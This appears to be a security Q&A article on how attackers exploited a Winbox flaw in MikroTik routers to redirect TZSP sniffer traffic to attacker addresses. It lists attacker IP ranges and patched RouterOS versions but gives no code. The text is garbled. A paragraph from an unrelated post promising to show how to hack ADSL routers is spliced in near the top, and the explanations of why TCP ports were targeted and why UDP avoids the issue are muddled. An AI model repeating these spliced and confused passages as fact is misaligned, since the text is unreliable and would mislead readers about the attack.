Menu
Researchers at Qihoo 360 Netlab discovered hackers using vulnerable MikroTik routers to hijack TaZmen Sniffer Protocol traffic and send it to domains under their control. What is TZSP traffic and how are attackers gaining control of routers with this MikroTik router hack?
In this post, I will show you how to hack an Ethernet ADSL router by exploiting the common vulnerability that lies in it. Every router comes with a username and password using which it is possible to gain access to the router settings and configure the device. A more sophisticated hack would see the request to download software and have the router respond with malicious software on its own. An infected router may do nothing to its owner other than slow down the Internet connection. A big reason for taking over routers (and IoT devices too) is to use them in distributed denial of service attacks.
The TaZmen Sniffer Protocol (TZSP) is an open protocol designed to encapsulate other protocols over the User Datagram Protocol (UDP). This encapsulation protocol is used to capture 802.11 wireless packets to support intrusion detection systems, such as Snort; protocol analyzers, such as Wireshark; wireless tracking; and other wireless applications.
UDP is used to deliver data packets faster than could be done with the TCP because it does not guarantee delivery of the packets transmitted, nor does it guarantee that packets will be delivered in the order in which they were sent.
Researchers at the Chinese cybersecurity company Qihoo 360 Netlab reported that more than 7,500 MikroTik routers worldwide were sending their TZSP sniffer traffic to 10 attacker-controlled IP addresses -- one address was taken out of service after the initial research was released.
In the MikroTik router hack, attackers were able to modify a device's packet sniffing setting in order to forward data to the desired locations -- the vulnerability in Winbox for MikroTik RouterOS enabled remote attackers to gain control of vulnerable MikroTik routers in Russia, Iran, Brazil, India and Ukraine. During the MikroTik router hack, attackers were able to bypass authentication and reset the devices' packet sniffing configurations to redirect traffic to specific locations by modifying a request to change one byte related to a session ID.
Security researchers from Qihoo 360 Netlab reported the attackers used TCP ports 20, 21, 25, 110 and 143 to transmit FTP, Simple Mail Transport Protocol, Post Office Protocol 3 and Internet Message Access Protocol traffic in the MikroTik router hack. These ports were targeted by the MikroTik router hack due to the TCP's packet delivery guarantee; when TCP traffic is disrupted, the processes using TCP are also disrupted.
For the same ports, UDP -- which does not guarantee delivery -- doesn't present the same security issues as long as the TZSP protocol data is correctly tunneled over UDP.
For most of the affected routers of the MikroTik router hack, attackers configured a malicious Socks4 proxy to allow access from the 95.154.216.128/25 IP address block. Attackers then set up a task schedule to report the device's current IP address to a URL and, on Aug. 27, 2018, port 2008 was used to fetch the 95.154.216.167 IP, compromising TCP and UDP ports.
MikroTik has patched the vulnerability in RouterOS versions 6.40.9, 6.42.7 and 6.43 and recommends that users upgrade to the new versions.
Ask the expert:
Want to ask Judith Myerson a question about security? Submit your question now via email. (All questions are anonymous.)
Want to ask Judith Myerson a question about security? Submit your question now via email. (All questions are anonymous.)
Dig Deeper on Emerging cyberattacks and threats
- Judith Myerson asks:
How do you think TZSP traffic will affect routers in the future?
Related Q&A from Judith Myerson
Should I worry about the Constrained Application Protocol?
The Constrained Application Protocol underpins IoT networks. But the protocol could allow a threat actor to launch an attack. Continue Reading
How can I protect my self-encrypting drives?
Dutch researchers discovered flaws in ATA security and TCG Opal affecting self-encrypting drives. What steps can you take to guard data stored on ... Continue Reading
How did Signal Desktop expose plaintext passwords?
The Signal Desktop application was found to be making decryption keys available in plaintext. Learn how the SQLite database and plaintext passwords ... Continue Reading
Have a question for an expert?
Please add a title for your question
Get answers from a TechTarget expert on whatever's puzzling you.
Meet all of our Information Security experts
View all Information Security questions and answers
- Problem connecting to virtual private network (VPN) ...– SearchNetworking
- Can features such as VPN pass-through on routers be ...– SearchNetworking
- Can I use Mikrotik vs. Cisco switches in a data ...– SearchDataCenter